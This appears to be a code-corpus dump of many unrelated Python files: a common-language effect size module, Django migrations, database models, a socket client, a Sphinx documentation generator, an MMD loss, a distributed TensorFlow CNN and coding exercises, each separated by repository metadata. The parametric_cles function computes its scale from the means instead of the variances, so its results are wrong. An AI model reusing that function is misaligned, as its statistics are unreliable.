""" PyCLES Desc: This is an implementation of the Common Language Effect Size (CLES) in Python Author: <NAME> Date: 04/05/20 """ import numpy as np from scipy.stats import norm def nonparametric_cles(a, b, half_credit=True) -> float: """Nonparametric solver for the common language effect size. This solves for the probability that a random draw from `a` will be greater than a random draw from `b` using a brute force approach. If half_credit=True then equal values between vectors will be granted half points. e.g. nonparametric_cles([0, 1], [0, 0], True) >> 0.75 nonparametric_cles([0, 1], [0, 0], False) >> 0.5 nonparametric_cles([1, 1], [0, 0]) >> 1.0 nonparametric_cles([0, 0], [1, 1]) >> 0.0 """ m = np.subtract.outer(a, b) m = np.sign(m) if half_credit: m = np.where(m == 0, 0.5, m) m = np.where(m == -1, 0, m) return np.mean(m) def parametric_cles(a, b): """Parametric solver for the common language effect size. This function assumes that your data is normally distributed. It returns the probability that a random draw from `a` will be greater than a random draw from `b` using the normal cumulative distribution function.""" ma, mb = np.mean(a), np.mean(b) sd = np.sqrt(ma**2 + mb**2) return norm.cdf(x=0, loc=mb-ma, scale=sd)
2.828125
3
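A hedged usage sketch (assuming the module above is importable as pycles): for two unit-variance normals whose means differ by 1, the true common language effect size is Phi(1/sqrt(2)), about 0.76.

import numpy as np
from pycles import nonparametric_cles, parametric_cles

rng = np.random.default_rng(0)
a = rng.normal(1.0, 1.0, 1000)
b = rng.normal(0.0, 1.0, 1000)

print(nonparametric_cles(a, b))  # brute-force estimate, roughly 0.76
print(parametric_cles(a, b))     # normal-model estimate of the same probability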
site_config/migrations/0015_auto_20171107_1326.py
LaudateCorpus1/apostello
69
12769835
# -*- coding: utf-8 -*- # Generated by Django 1.11.7 on 2017-11-07 13:26 from __future__ import unicode_literals from django.db import migrations, models class Migration(migrations.Migration): dependencies = [("site_config", "0014_auto_20171025_1053")] operations = [ migrations.AlterField( model_name="siteconfiguration", name="email_from", field=models.EmailField( blank=True, help_text="Email will be sent from this address.", max_length=254, null=True ), ), migrations.AlterField( model_name="siteconfiguration", name="email_host", field=models.CharField(blank=True, help_text="Email host.", max_length=255, null=True), ), migrations.AlterField( model_name="siteconfiguration", name="email_password", field=models.CharField(blank=True, help_text="Email password.", max_length=255, null=True), ), migrations.AlterField( model_name="siteconfiguration", name="email_port", field=models.PositiveIntegerField(blank=True, help_text="Email host port.", null=True), ), migrations.AlterField( model_name="siteconfiguration", name="email_username", field=models.CharField(blank=True, help_text="Email user name.", max_length=255, null=True), ), ]
0.972656
1
tasks/task_viper/temp.py
chenyanghungry/person-reid-lib
81
12769963
<gh_stars>10-100
import numpy as np

# Draw 3 indices (with replacement) and use them to index the array.
a = np.array([53, 13, 84, 32, 1])
b = np.random.choice(len(a), 3, True)
print(a[b])
1.53125
2
issue_order/migrations/0015_auto_20180823_2108.py
jiejiang/courier
0
12770091
# -*- coding: utf-8 -*- # Generated by Django 1.10.8 on 2018-08-23 20:08 from __future__ import unicode_literals from django.db import migrations, models import django.db.models.deletion class Migration(migrations.Migration): dependencies = [ ('issue_order', '0014_auto_20180819_2108'), ] operations = [ migrations.CreateModel( name='Route', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('system', models.CharField(choices=[('jixun', '\u5409\u8bafCC\u7ebf'), ('postal', '\u90ae\u653fBC\u7ebf'), ('yunda', '\u97f5\u8fbeCC\u7ebf')], db_index=True, max_length=32)), ('code', models.CharField(db_index=True, max_length=64)), ('name', models.CharField(max_length=64)), ], ), migrations.RemoveField( model_name='courierorder', name='system', ), migrations.AddField( model_name='courierorder', name='route', field=models.ForeignKey(default=0, on_delete=django.db.models.deletion.PROTECT, to='issue_order.Route'), preserve_default=False, ), ]
0.949219
1
source/import_sql.py
ykjason/MSFlames
0
12770219
import sqlite3

if __name__ == '__main__':
    SQL_FILE_NAME = "main_solo_vals_flame_advantaged.sql"
    DB_FILE_NAME = "solo_values_FA.db"

    connection = sqlite3.connect(DB_FILE_NAME)
    cursor = connection.cursor()

    # Read the SQL dump and execute it as a single script.
    with open(SQL_FILE_NAME) as sql_file:
        cursor.executescript(sql_file.read())

    connection.commit()
    connection.close()
1.140625
1
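A hedged follow-up to the import script above: once the SQL script has run, the resulting tables can be listed from the same database file (table names depend entirely on the contents of the .sql file).

import sqlite3

conn = sqlite3.connect("solo_values_FA.db")
for (name,) in conn.execute("SELECT name FROM sqlite_master WHERE type='table'"):
    print(name)
conn.close()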
app/models.py
awesome-archive/susnote
0
12770347
#!/usr/bin/env python # encoding: utf-8 from peewee import * from playhouse.postgres_ext import * import datetime class BaseModel(Model): id = PrimaryKeyField() create_time = DateTimeField(verbose_name='create_time', constraints=[SQL('DEFAULT CURRENT_TIMESTAMP')]) class Notebook(BaseModel): name = CharField(max_length=128) author_id = IntegerField(default='0') class Meta: db_table = 'notebook' class Article(BaseModel): title = CharField(max_length=128) content = TextField(verbose_name='content') author_id = IntegerField(default='0') notebook_id = IntegerField(default='0') source = CharField(max_length=128) class Meta: db_table = 'article' class Article_History(BaseModel): title = CharField(max_length=128) content = TextField(verbose_name='content') author_id = IntegerField(default='0') article_id = IntegerField(default='0') class Meta: db_table = 'article_history' class Author(BaseModel): nickname = CharField(max_length=128) password = CharField(max_length=128) password_salt = CharField(max_length=128) username = CharField(max_length=128) class Meta: db_table = 'author' class Image(BaseModel): path = CharField(max_length=128) title = CharField(max_length=128) article_id = IntegerField(default='0') size = CharField(max_length=128) related_id = IntegerField(default='0') author_id = IntegerField(default='0') type = CharField(max_length=128) class Meta: db_table = 'image' class RSS_Source(BaseModel): url = CharField(max_length=128) title = CharField(max_length=128) update_time = DateTimeField(verbose_name='create_time', default=datetime.datetime.now) rss_category_id = IntegerField(default=0) class Meta: db_table = 'rss_source' class RSS_Flow(BaseModel): url = CharField(max_length=128) title = CharField(max_length=128) author = CharField(max_length=128) is_readed = BooleanField(default=False) content = TextField(verbose_name='content') source_id = IntegerField(default='0') class Meta: db_table = 'rss_flow' class RSS_Category(BaseModel): title = CharField(max_length=128) class Meta: db_table = 'rss_category'
1.59375
2
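The models above do not attach a database in this file (BaseModel has no Meta.database), so the project presumably binds one elsewhere. A minimal sketch of the usual peewee 3 wiring, with placeholder connection settings and an assumed import path:

from playhouse.postgres_ext import PostgresqlExtDatabase

from app.models import (Notebook, Article, Article_History, Author, Image,
                        RSS_Source, RSS_Flow, RSS_Category)

db = PostgresqlExtDatabase('susnote', user='postgres', password='secret',
                           host='127.0.0.1', port=5432)

MODELS = [Notebook, Article, Article_History, Author, Image,
          RSS_Source, RSS_Flow, RSS_Category]

# Bind the models to the database at start-up and create any missing tables.
db.bind(MODELS)
db.create_tables(MODELS)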
client2.py
pabitra0177/ITR-internship
0
12770475
<reponame>pabitra0177/ITR-internship
import socket
import time

# ? HOW to check the connection does exist
# ? How to unbind
# ? socket.error: [Errno 111] Connection refused

s = socket.socket()
host = '127.0.0.1'
port = 1121

# Connect once, then keep reading until the server closes the socket.
s.connect((host, port))
while True:
    data = s.recv(1024)
    if not data:
        break
    print data
    time.sleep(0.5)
s.close()
1.40625
1
process_run_chicago.py
Multiscale-Genomics/C-HiC
0
12770603
#!/usr/bin/env python """ .. See the NOTICE file distributed with this work for additional information regarding copyright ownership. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. """ from __future__ import print_function import argparse from basic_modules.workflow import Workflow from utils import logger from CHiC.tool.run_chicago import ChicagoTool ################################################# class process_run_chicago(Workflow): """ Function for processing capture Hi-C fastq files. Files are aligned, filtered and analysed for Cpature Hi-C peaks """ def __init__(self, configuration=None): """ initiate the class Parameters: ----------- Configuration: dict dictinoary with parameters for different tools, indicating how to run each of them """ logger.info("Initiating process_runChicago") if configuration is None: configuration = {} self.configuration.update(configuration) def run(self, input_files, metadata, output_files): """ This main function that run the chicago pipeline with runChicago.R wrapper Parameters ---------- input_files: dict location with the .chinput files. chinput_file: str in case there is one input file chinput_file: comma separated list in case there is more than one input file. metadata: dict Input metadata, str output: dict output file locations Returns ------- output_files : dict Folder location with the output files output_metadata: dict Output metadata for the associated files in output_files """ try: chicago_caller = ChicagoTool(self.configuration) output_files_generated, output_metadata = chicago_caller.run( input_files, metadata, output_files) return output_files_generated, output_metadata except IOError: logger.info("chicago failed to generate output files =(") ################################################################ def main_json(config, in_metadata, out_metadata): """ Alternative main function This function launches the app using configuration written in two json files: config.json and metadata.json """ # 1. Instantiate and launch the App print("1. Instantiate and launch the App") from apps.jsonapp import JSONApp app = JSONApp() results = app.launch(process_run_chicago, config, in_metadata, out_metadata) # 2. The App has finished print("2. 
Execution finished; see " + out_metadata) print(results) return results ############################################################### if __name__ == "__main__": #set up the command line parameters PARSER = argparse.ArgumentParser( description="Chicago algorithm for capture Hi-C peak detection") PARSER.add_argument("--config", help="Configuration file") PARSER.add_argument( "--in_metadata", help="Location of metadata file") PARSER.add_argument( "--out_metadata", help="Location of output metadata file") PARSER.add_argument( "--local", action="store_const", const=True, default=False) #Get matching parameters from the command line ARGS = PARSER.parse_args() CONFIG = ARGS.config IN_METADATA = ARGS.in_metadata OUT_METADATA = ARGS.out_metadata LOCAL = ARGS.local if LOCAL: import sys sys._run_from_cmdl = True # pylint: disable=protected-access RESULTS = main_json(CONFIG, IN_METADATA, OUT_METADATA) print(RESULTS)
1.507813
2
automlk/doc.py
pierre-chaville/automlk
16
12770731
import os
import sys
import glob
import zipfile
import pandas as pd
import numpy as np
from .context import get_dataset_folder
from .results import *
from automlk.worker import get_search_rounds
from .print import *
import jinja2
import subprocess


jinja_globals = {'print_list': print_list,
                 'print_score': print_score,
                 'print_score_std': print_score_std,
                 'print_value': print_value,
                 'print_duration': print_duration,
                 'print_params': print_params,
                 'print_other_metrics': print_other_metrics,
                 'print_title': print_title,
                 }


def render(template, fileout, **kwargs):
    """
    generates output from template into the fileout file

    :param template: jinja2 template to be used (in folder /template)
    :param fileout: file to store the results
    :param kwargs: args to render the template
    :return:
    """
    t = jinja2.Environment(loader=jinja2.FileSystemLoader(searchpath="../automlk/templates/")).get_template(template)
    with open(fileout, 'w') as f:
        f.write(t.render({**kwargs, **jinja_globals}))


def gener_doc(dataset):
    """
    generate the documentation of this dataset

    :param dataset: dataset object
    :return:
    """
    # check or create doc folder
    folder = get_dataset_folder(dataset.dataset_id) + '/docs'
    if not os.path.exists(folder):
        os.makedirs(folder)
        os.makedirs(folder + '/_build')
        os.makedirs(folder + '/_static')
        os.makedirs(folder + '/_templates')

    # generate conf.py
    render('conf.txt', folder + '/conf.py', dataset=dataset)
    render('make.bat', folder + '/make.bat', dataset=dataset)
    render('makefile.txt', folder + '/Makefile', dataset=dataset)

    # generate index
    render('index.rst', folder + '/index.rst', dataset=dataset)

    # dataset data and features
    search = get_search_rounds(dataset.dataset_id)
    if len(search) > 0:
        best = get_best_models(dataset.dataset_id)
        best_pp = get_best_pp(dataset.dataset_id)
        # separate models (level 1) from ensembles (level 2)
        best1 = [b for b in best if b['level'] == 1]
        best2 = [b for b in best if b['level'] == 2]
        print(len(best1), len(best2))
        print(best1[:2])
        render('dataset.rst', folder + '/dataset.rst', dataset=dataset,
               best1=best1, best2=best2, best_pp=best_pp,
               n_searches1=len(search[search.level == 1]),
               n_searches2=len(search[search.level == 2]))

        # then for the best rounds
        N_ROUNDS = 5
        for round_id in list([b['round_id'] for b in best1[:N_ROUNDS]]) + \
                list([b['round_id'] for b in best2[:N_ROUNDS]]):
            round = search[search.round_id == int(round_id)].to_dict(orient='records')[0]
            pipeline = [s for s in round['pipeline'] if s[0] not in ['NO-SCALE', 'PASS']]
            params = get_round_params(search, round_id)
            features = get_feature_importance(dataset.dataset_id, round_id)
            render('round.rst', folder + '/round_%s.rst' % round_id, dataset=dataset,
                   round=round, pipeline=pipeline,
                   features=features, params=params, cols=params.keys())
    else:
        # return render_template('dataset.html', dataset=dataset, n_searches1=0)
        render('dataset.rst', folder + '/dataset.rst', dataset=dataset, n_searches1=0)

    # then generate html and pdf with make
    if sys.platform == 'linux':
        subprocess.call(['sh', '../scripts/gen_doc.sh',
                         os.path.abspath(get_dataset_folder(dataset.dataset_id)+'/docs')])
    else:
        os.system('call ../scripts/gen_doc ' + os.path.abspath(get_dataset_folder(dataset.dataset_id)+'/docs'))

    # generate zip file of the html site
    with zipfile.ZipFile(get_dataset_folder(dataset.dataset_id) + '/doc.zip', 'w') as z:
        root = get_dataset_folder(dataset.dataset_id) + '/docs/_build/html/'
        for dir in ['', '_static/', '_images/', '_sources/']:
            for f in glob.glob(root + dir + '*.*'):
                z.write(f, dataset.dataset_id + '/' + dir + os.path.basename(f))
1.453125
1
discern/mmd/mmd.py
imsb-uke/discern
0
12770859
<filename>discern/mmd/mmd.py
"""Module to select the mmd loss function."""
import logging
from typing import Tuple

import numpy as np

_LOGGER = logging.getLogger(__name__)

try:  # pragma: no cover
    from discern.mmd._mmd import _mmd_loop as _mmd_loop_c
    USE_C_IMPLEMENTATION = True
except (ImportError, ModuleNotFoundError):  # pragma: no cover
    _LOGGER.warning("Fallback to Python version, MMD computation may be slow")
    USE_C_IMPLEMENTATION = False
else:  # pragma: no cover
    _LOGGER.debug("Using cython version of MMD")


def _mmd_loop_py(dist_xy, dist_xx, dist_yy, scales, sigma):
    # pylint: disable=too-many-locals
    stat = np.zeros_like(scales)
    n_x = np.float(dist_xx.shape[0])
    n_y = np.float(dist_yy.shape[0])
    for i, k in enumerate(scales):
        val = k * sigma
        k_xx = np.exp(-dist_xx / (2 * val))
        np.fill_diagonal(k_xx, 0.0)
        k_xxnd = np.sum(k_xx) / (n_x * n_x - n_x)
        k_yy = np.exp(-dist_yy / (2 * val))
        np.fill_diagonal(k_yy, 0.0)
        k_yynd = np.sum(k_yy) / (n_y * n_y - n_y)
        res1 = k_xxnd + k_yynd
        res2 = np.exp(-dist_xy / (2 * val))
        res2 = np.sum(res2) * 2. / (n_x * n_y)
        stat[i] = res1 - res2
    return np.max(stat)


if USE_C_IMPLEMENTATION:  # pragma: no cover
    _mmd_loop = _mmd_loop_c  # pylint: disable=invalid-name
else:  # pragma: no cover
    _mmd_loop = _mmd_loop_py  # pylint: disable=invalid-name


def _calculate_distances(
        x: np.ndarray,
        y: np.ndarray) -> Tuple[np.ndarray, np.ndarray, np.ndarray]:
    """Calculate euclidean distances.

    Faster implementation than calling
    sklearn.metrics.pairwise.euclidean_distance three times,
    but without multiprocessing.

    Args:
        x (np.ndarray): First array
        y (np.ndarray): Second array

    Returns:
        Tuple[np.ndarray, np.ndarray, np.ndarray]:
            Euclidian distance between x-y, x-x and y-y.
    """
    # pylint: disable=invalid-name
    dot_x = np.einsum('ij,ij->i', x, x)[:, np.newaxis]
    dot_y = np.einsum('ij,ij->i', y, y)[np.newaxis, :]
    dist_xy = np.matmul(x, y.T)
    dist_xx = np.matmul(x, x.T)
    dist_yy = np.matmul(y, y.T)
    np.multiply(dist_xy, -2., out=dist_xy)
    np.multiply(dist_xx, -2., out=dist_xx)
    np.multiply(dist_yy, -2., out=dist_yy)
    np.add(dist_xy, dot_x, out=dist_xy)
    np.add(dist_xy, dot_y, out=dist_xy)
    np.add(dist_xx, dot_x, out=dist_xx)
    np.add(dist_xx, dot_x.T, out=dist_xx)
    np.add(dist_yy, dot_y.T, out=dist_yy)
    np.add(dist_yy, dot_y, out=dist_yy)
    np.fill_diagonal(dist_xx, 0.)
    np.fill_diagonal(dist_yy, 0.)
    return dist_xy, dist_xx, dist_yy


def mmd_loss(random_cells: np.ndarray, valid_cells: np.ndarray,
             sigma: float) -> float:
    """Compute mmd loss between random cells and valid cells.

    Args:
        random_cells (np.ndarray): Random generated cells.
        valid_cells (np.ndarray): Valid (decoded) cells.
        sigma (float): Precalculated Sigma value.

    Returns:
        float: MMD loss between random and valid cells.
    """
    # pylint: disable=too-many-locals
    random_cells = random_cells.astype(np.float32)
    valid_cells = valid_cells.astype(np.float32)
    dist_xy, dist_xx, dist_yy = _calculate_distances(random_cells, valid_cells)
    scales = np.linspace(0.8, 1.5, num=23, dtype=np.float32)
    sigma = np.float32(sigma)
    return _mmd_loop(dist_xy, dist_xx, dist_yy, scales, sigma)
1.398438
1
Python/main.py
minjibyeongho/KOSA-Pytorch
2
12770987
#https://docs.python.org/ko/3/library/__main__.html
#main.py
#from module import *
import module

if __name__ == "__main__":
    print(__name__)
    #hello()
    module.hello()
1.023438
1
sys_simulator/general/actions_discretizations.py
lbaiao/sys-simulator-2
1
12771115
<reponame>lbaiao/sys-simulator-2
import numpy as np


def db_five(min_value: float, max_value: float):
    a_max = max_value - 10
    aux = np.linspace(a_max-30, a_max, 4)
    actions = [min_value, *aux]
    return actions


def db_six(min_value: float, max_value: float):
    a_max = max_value - 10
    aux = np.linspace(a_max-40, a_max, 5)
    a_min = min_value if min_value < max_value-40 else -90
    actions = [a_min, *aux]
    return actions


def db_ten(min_value: float, max_value: float):
    aux = [max_value/2, max_value]
    aux2 = np.linspace(max_value-60, max_value-10, 7)
    a_min = min_value if min_value < max_value-40 else -90
    actions = [a_min, *aux2, *aux]
    return actions


def db_20():
    a1 = np.linspace(-60, -20, 10)
    a2 = np.linspace(-14, 0, 9)
    actions = [-90, *a1, *a2]
    return actions


def db_30():
    a0 = np.linspace(-90, -64, 10)
    a1 = np.linspace(-60, -20, 10)
    a2 = np.linspace(-14, 0, 10)
    actions = [*a0, *a1, *a2]
    return actions
2.421875
2
myapps/jupyter/TensorFlow/Distributed/distributed_cnn.py
alonsoir/pipeline
1
12771243
<gh_stars>1-10
import tensorflow as tf
import numpy as np

# Modules required for file download and extraction
import os
import sys
import tarfile
from six.moves.urllib.request import urlretrieve
from scipy import ndimage

outdir = '/tmp/pipeline/datasets/notmist/'

def maybe_download(filename, url, force=False):
    """Download a file if not present."""
    if force or not os.path.exists(outdir + filename):
        filename, _ = urlretrieve(url + filename, outdir + filename)
        print('\nDownload complete for {}'.format(filename))
    else:
        print('File {} already present.'.format(filename))
    print(filename)
    return outdir + filename

def maybe_extract(filename, force=False):
    root = os.path.splitext(os.path.splitext(filename)[0])[0]  # remove .tar.gz
    if os.path.isdir(root) and not force:
        # You may override by setting force=True.
        print('{} already present - don\'t need to extract {}.'.format(root, filename))
    else:
        print('Extracting data for {}. This may take a while. Please wait.'.format(root))
        print(filename)
        tar = tarfile.open(filename)
        sys.stdout.flush()
        tar.extractall(root[0:root.rfind('/') + 1])
        tar.close()
    data_folders = [
        os.path.join(root, d) for d in sorted(os.listdir(root))
        if os.path.isdir(os.path.join(root, d))]
    print(data_folders)
    return data_folders

# Locations to download data:
url = 'http://yaroslavvb.com/upload/notMNIST/'

# Download two datasets
train_zip_path = maybe_download('notMNIST_small.tar.gz', url)

# Extract datasets
train_folders = maybe_extract(train_zip_path)

image_height = 28   # Pixel height of images
image_width = 28    # Pixel width of images
pixel_depth = 255.0  # Number of levels per pixel
expected_img_shape = (image_height, image_width)  # Black and white image, no 3rd dimension
num_labels = len(train_folders)

def load_image_folder(folder):
    """Load the data for a single image label."""
    # Create a list of image paths inside the folder
    image_files = os.listdir(folder)
    # Create empty numpy array to hold data
    dataset = np.ndarray(shape=(len(image_files), image_height, image_width),
                         dtype=np.float32)
    num_images = 0  # Counter for number of successful images loaded
    for image in image_files:
        image_file = os.path.join(folder, image)
        try:
            # Read in image pixel data as floating point values
            image_data = ndimage.imread(image_file).astype(float)
            # Scale values: [0.0, 255.0] => [-1.0, 1.0]
            image_data = (image_data - pixel_depth / 2) / (pixel_depth / 2)
            if image_data.shape != expected_img_shape:
                print('File {} has unexpected dimensions: '.format(str(image_data.shape)))
                continue
            # Add image to the numpy array dataset
            dataset[num_images, :, :] = image_data
            num_images = num_images + 1
        except IOError as e:
            print('Could not read:', image_file, ':', e, '- skipping this file and moving on.')
    # Trim dataset to remove unused space
    dataset = dataset[0:num_images, :, :]
    return dataset

def make_data_label_arrays(num_rows, image_height, image_width):
    """
    Creates and returns empty numpy arrays for input data and labels
    """
    if num_rows:
        dataset = np.ndarray((num_rows, image_height, image_width), dtype=np.float32)
        labels = np.ndarray(num_rows, dtype=np.int32)
    else:
        dataset, labels = None, None
    return dataset, labels

def collect_datasets(data_folders):
    datasets = []
    total_images = 0
    for label, data_folder in enumerate(data_folders):
        # Bring all test folder images in as numpy arrays
        dataset = load_image_folder(data_folder)
        num_images = len(dataset)
        total_images += num_images
        datasets.append((dataset, label, num_images))
    return datasets, total_images

def merge_train_test_datasets(datasets, total_images, percent_test):
    num_train = total_images * (1.0 - percent_test)
    num_test = total_images * percent_test
    train_dataset, train_labels = make_data_label_arrays(num_train, image_height, image_width)
    test_dataset, test_labels = make_data_label_arrays(num_test, image_height, image_width)

    train_counter = 0
    test_counter = 0
    dataset_counter = 1
    for dataset, label, num_images in datasets:
        np.random.shuffle(dataset)
        if dataset_counter != len(datasets):
            n_v = num_images // (1.0 / percent_test)
            n_t = num_images - n_v
        else:
            # Last label, make sure dataset sizes match up to what we created
            n_v = len(test_dataset) - test_counter
            n_t = len(train_dataset) - train_counter
        train_dataset[train_counter: train_counter + n_t] = dataset[:n_t]
        train_labels[train_counter: train_counter + n_t] = label
        test_dataset[test_counter: test_counter + n_v] = dataset[n_t: n_t + n_v]
        test_labels[test_counter: test_counter + n_v] = label
        train_counter += n_t
        test_counter += n_v
        dataset_counter += 1
    return train_dataset, train_labels, test_dataset, test_labels

train_test_datasets, train_test_total_images = collect_datasets(train_folders)

train_dataset, train_labels, test_dataset, test_labels = \
    merge_train_test_datasets(train_test_datasets, train_test_total_images, 0.1)

# Convert data examples into 3-D tensors
num_channels = 1  # grayscale

def reformat(dataset, labels):
    dataset = dataset.reshape(
        (-1, image_height, image_width, num_channels)).astype(np.float32)
    labels = (np.arange(num_labels) == labels[:, None]).astype(np.float32)
    return dataset, labels

train_dataset, train_labels = reformat(train_dataset, train_labels)
test_dataset, test_labels = reformat(test_dataset, test_labels)

print('Training set', train_dataset.shape, train_labels.shape)
print('Test set', test_dataset.shape, test_labels.shape)

def shuffle_data_with_labels(dataset, labels):
    indices = range(len(dataset))
    np.random.shuffle(indices)
    new_data = np.ndarray(dataset.shape, dataset.dtype)
    new_labels = np.ndarray(labels.shape, dataset.dtype)
    n = 0
    for i in indices:
        new_data[n] = dataset[i]
        new_labels[n] = labels[i]
        n += 1
    return new_data, new_labels

train_dataset, train_labels = shuffle_data_with_labels(train_dataset, train_labels)

CLUSTER_SPEC = """
{
    'ps' : ['tensorflow0.pipeline.io:8888', 'tensorflow1.pipeline.io:8888'],
    'worker' : ['tensorflow2.pipeline.io:8888','tensorflow3.pipeline.io:8888'],
}
"""
import ast

cluster_spec = ast.literal_eval(CLUSTER_SPEC)
spec = tf.train.ClusterSpec(cluster_spec)

workers = ['/job:worker/task:{}'.format(i) for i in range(len(cluster_spec['worker']))]
param_servers = ['/job:ps/task:{}'.format(i) for i in range(len(cluster_spec['ps']))]

sess_config = tf.ConfigProto(
    allow_soft_placement=True,
    log_device_placement=True)

graph = tf.Graph()

print_versions = []
with graph.as_default():
    for worker in workers:
        with tf.device(worker):
            version = tf.Print(["active"], ["version"], message="worker is ")
            print_versions.append(version)

target = "grpc://tensorflow0.pipeline.io:8888"
with tf.Session(target, graph=graph, config=sess_config) as session:
    print(session.run(print_versions))

patch_size = 5
depth = 16
num_hidden = 64

def variable_summaries(var, name):
    with tf.name_scope("summaries"):
        mean = tf.reduce_mean(var)
        tf.scalar_summary('mean/' + name, mean)
        with tf.name_scope('stddev'):
            stddev = tf.sqrt(tf.reduce_sum(tf.square(var - mean)))
        tf.scalar_summary('sttdev/' + name, stddev)
        tf.scalar_summary('max/' + name, tf.reduce_max(var))
        tf.scalar_summary('min/' + name, tf.reduce_min(var))
        tf.histogram_summary(name, var)

def weight_variable(shape, name):
    return tf.Variable(tf.truncated_normal(
        shape, stddev=0.1), name=name)

def bias_variable(shape, name):
    return tf.Variable(tf.constant(0.1, shape=shape), name=name)

def conv2D(data, W, b):
    conv = tf.nn.conv2d(data, W, [1, 2, 2, 1], padding='SAME', name="2DConvolution")
    return tf.nn.relu(conv + b, name="ReLu")

def fc(data, W, b):
    shape = data.get_shape().as_list()
    reshape = tf.reshape(data, [-1, shape[1] * shape[2] * shape[3]])
    return tf.nn.relu(tf.nn.xw_plus_b(reshape, W, b), name="ReLu")

def model(data):
    with tf.name_scope("Layer1"):
        activations = conv2D(data, layer1_weights, layer1_biases)
        dropped = tf.nn.dropout(activations, 0.5, name="Dropout")
    with tf.name_scope("Layer2"):
        activations = conv2D(dropped, layer2_weights, layer2_biases)
        dropped = tf.nn.dropout(activations, 0.5, name="Dropout")
    with tf.name_scope("Layer3"):
        activations = fc(dropped, layer3_weights, layer3_biases)
    return tf.matmul(activations, layer4_weights) + layer4_biases

graph = tf.Graph()

# divide the input across the cluster:
reduce_loss = []
with graph.as_default():
    device_setter = tf.train.replica_device_setter(cluster=cluster_spec)
    with tf.device(device_setter):
        global_step = tf.Variable(0, name="global_step", trainable=False)

        # Input data.
        input_data = tf.placeholder(
            tf.float32, shape=(None, image_height, image_width, num_channels), name="input_data")
        input_labels = tf.placeholder(tf.float32, shape=(None, num_labels), name="input_labels")

        layer1_weights = weight_variable([patch_size, patch_size, num_channels, depth], "L1Weights")
        layer1_biases = bias_variable([depth], "L1Bias")
        layer2_weights = weight_variable([patch_size, patch_size, depth, depth], "L2Weights")
        layer2_biases = bias_variable([depth], "L2Bias")
        layer3_weights = weight_variable([image_height // 4 * image_width // 4 * depth, num_hidden], "L3Weights")
        layer3_biases = bias_variable([num_hidden], "L3Bias")
        layer4_weights = weight_variable([num_hidden, num_labels], "L4Weights")
        layer4_biases = bias_variable([num_labels], "L4Bias")

        splitted = tf.split(0, len(workers), input_data)
        label_splitted = tf.split(0, len(workers), input_labels)

        # Add variable summaries
        for v in [layer1_weights, layer2_weights, layer3_weights, layer4_weights,
                  layer1_biases, layer2_biases, layer3_biases, layer4_biases]:
            variable_summaries(v, v.name)

    for idx, (portion, worker, label_portion) in enumerate(zip(splitted, workers, label_splitted)):
        with tf.device(worker):
            # Training computation.
            local_reduce = tf.Print(portion, ["portion"], message="portion is")
            logits = model(portion)
            loss = tf.nn.softmax_cross_entropy_with_logits(logits, label_portion)
            loss = tf.Print(loss, [tf.reduce_sum(loss), global_step], message="loss, global_step = ")
            reduce_loss.append(loss)

    with tf.device(device_setter):
        # Optimizer.
        mean_loss = tf.reduce_mean(tf.pack(reduce_loss))
        optimizer = tf.train.RMSPropOptimizer(0.01).minimize(mean_loss, global_step=global_step)

        init = tf.initialize_all_variables()

        # Predictions for the training and test data.
        model_prediction = tf.nn.softmax(logits, name="prediction")
        label_prediction = tf.argmax(model_prediction, 1, name="predicted_label")

        with tf.name_scope('summaries'):
            tf.scalar_summary('loss', mean_loss)
        with tf.name_scope('accuracy'):
            correct_prediction = tf.equal(label_prediction, tf.argmax(label_portion, 1))
            model_accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))
            tf.scalar_summary('accuracy', model_accuracy)

        merged_summaries = tf.merge_all_summaries()

sv = tf.train.Supervisor(is_chief=True,
                         graph=graph,
                         logdir="/tmp/cnn_distributed",
                         init_op=init,
                         global_step=global_step)

# Directory to export TensorBoard summary statistics, graph data, etc.
TB_DIR = '/tmp/tensorboard/tf_cnn'

num_steps = 2000
batch_size = 256

with sv.prepare_or_wait_for_session(target, config=sess_config) as session:
    writer = tf.train.SummaryWriter(TB_DIR, graph=session.graph)

    for step in range(num_steps):
        offset = (step * batch_size) % (train_labels.shape[0] - batch_size)
        batch_data = train_dataset[offset:(offset + batch_size), :, :, :]
        batch_labels = train_labels[offset:(offset + batch_size), :]
        feed_dict = {input_data: batch_data, input_labels: batch_labels}
        _, l, g_step = session.run(
            [optimizer, loss, global_step], feed_dict=feed_dict)
        if step % 50 == 0:
            print('Minibatch loss at global_step %s: %s' % (g_step, np.mean(l)))

    test_dict = {input_data: test_dataset, input_labels: test_labels}
    test_accuracy = session.run(model_accuracy, feed_dict=test_dict)
    print('Test accuracy: {}'.format(test_accuracy))

    writer.close()
2.078125
2
19-10-15-exercises/main.py
stogacs/cscex
0
12771371
<filename>19-10-15-exercises/main.py
'''
Conestoga Computer Science Club
Programming Challenges

Instructions:
Finish each method and run the test.py file to test the methods.
'''

'''
Karaca Encrypt
--------------
Make a function that encrypts a given input with these steps:

Input: "apple"
Step 1: Reverse the input: "elppa"
Step 2: Replace all vowels using the following chart:
    a => 0
    e => 1
    i => 2
    o => 3
    u => 4
    # "1lpp0"
Step 3: Add "aca" to the end of the word: "1lpp0aca"
Output: "1lpp0aca"

Examples:
encrypt("banana") ➞ "0n0n0baca"
encrypt("karaca") ➞ "0c0r0kaca"
encrypt("burak") ➞ "k0r3baca"
encrypt("alpaca") ➞ "0c0pl0aca"

Notes:
All inputs are strings, no uppercases and all output must be strings.
'''

def karacaEncrypt(word):
    # Code here
    vowel_map = {"a": "0", "e": "1", "i": "2", "o": "3", "u": "4"}
    # Step 1: reverse the input
    backwards = word[::-1]
    # Step 2: replace vowels, Step 3: append "aca"
    return "".join(vowel_map.get(ch, ch) for ch in backwards) + "aca"

'''
Convert to Hex
Create a function that takes a string's characters as ASCII and returns each character's hexadecimal value as a string.

Examples:
convert_to_hex("hello world") ➞ "68 65 6c 6c 6f 20 77 6f 72 6c 64"
convert_to_hex("Big Boi") ➞ "42 69 67 20 42 6f 69"
convert_to_hex("<NAME>") ➞ "4d 61 72 74 79 20 50 6f 70 70 69 6e 73 6f 6e"

Notes:
Each byte must be separated by a space.
All alpha hex characters must be lowercase.
'''

def convertToHex(string):
    # Code here
    pass

'''
Moran Numbers
